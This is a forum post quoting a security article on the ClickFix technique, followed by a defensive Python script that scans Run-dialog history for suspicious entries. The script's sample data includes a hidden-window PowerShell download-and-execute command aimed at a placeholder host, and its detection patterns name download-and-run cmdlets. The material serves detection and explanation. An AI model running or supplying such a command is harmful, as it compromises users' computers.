30 April 25, 05:47
Quote: An infection tactic called ClickFix is becoming increasingly popular among cybercriminals. We explain how such attacks work and how to protect your company against them.
Attackers are increasingly using the ClickFix technique to infect Windows computers, forcing users to run malicious scripts manually. The use of this tactic was first seen in the spring of 2024. Since then, attackers have come up with a number of scenarios for its use.
What is ClickFix?
The ClickFix technique is essentially an attempt to execute a malicious command on the victim’s computer relying solely on social engineering techniques. Under one pretext or another, attackers convince the user to copy a long command line (in the vast majority of cases — a PowerShell script), paste it into the system’s Run window, and press Enter, which should ultimately lead to compromising the system.
The attack normally begins with a pop-up window simulating a notification about a technical problem. To fix this problem, the user needs to perform a few simple steps, which boil down to copying some object and executing it through the Run application. However, in Windows 11, PowerShell can also be executed from the search bar for applications, settings, and documents, which opens when you click on the icon with the system’s logo, so sometimes the victim is asked to copy something there.
![[Image: what-is-clickfix-copyfix.png]](https://media.kasperskydaily.com/wp-content/uploads/sites/92/2025/04/29155621/what-is-clickfix-copyfix.png)
ClickFix attack – how to infect your own computer with malware in three easy steps.
This technique earned itself the name ClickFix because usually the notification contains a button, the name of which is somehow related to the verb “to fix” (Fix, How to fix, Fix it…), which the user needs to click to solve the alleged problem or see instructions for solving it. However, this isn’t a mandatory element — the need to launch some code can be justified by the requirement to check the computer’s security, or, for example, to confirm that the user is not a robot. In this case, the Fix button can be omitted.
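A defender's view of the Run-window step described in the quoted article, as an added example that is not part of the original post or the quoted article: commands typed or pasted into the Run dialog are recorded per user under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, so exported values from that key can be triaged for ClickFix-style entries. The sample values, the indicator patterns and the length threshold are assumptions constructed for this example, and the check covers only the Run dialog path.

```python
import re

# Values as exported from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Windows appends "\1" to each command entered in the Run dialog; MRUList orders
# the value names newest first. All entries below are constructed sample data.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "cmd\\1",
    "b": "\\\\fileserver\\share\\reports\\1",
    "c": "powershell -w hidden -c \"iex (irm https://example.invalid/verify)\" # I am not a robot - reCAPTCHA ID: 0000\\1",
}

# Heuristics chosen for this example (assumptions; tune for your environment).
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|bitsadmin)(\.exe)?\b", re.I)
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s", re.I),
    "download_and_run": re.compile(
        r"\b(iex|invoke-expression|irm|iwr|invoke-webrequest|downloadstring)\b", re.I),
    "decoy_comment": re.compile(r"#.*(robot|captcha|verif)", re.I),
}
MAX_TYPED_LENGTH = 80  # assumption: hand-typed Run commands are rarely longer

def triage_runmru(values):
    """Return [(command, [reasons])] for suspicious Run-dialog entries, newest first."""
    findings = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        command = raw[:-2] if raw.endswith("\\1") else raw
        if not INTERPRETERS.search(command):
            continue  # plain paths and program names are normal Run usage
        reasons = [label for label, rx in INDICATORS.items() if rx.search(command)]
        if len(command) > MAX_TYPED_LENGTH:
            reasons.append("long_command")
        if reasons:
            findings.append((command, reasons))
    return findings

if __name__ == "__main__":
    for command, reasons in triage_runmru(SAMPLE_RUNMRU):
        print(", ".join(reasons), "->", command)
```
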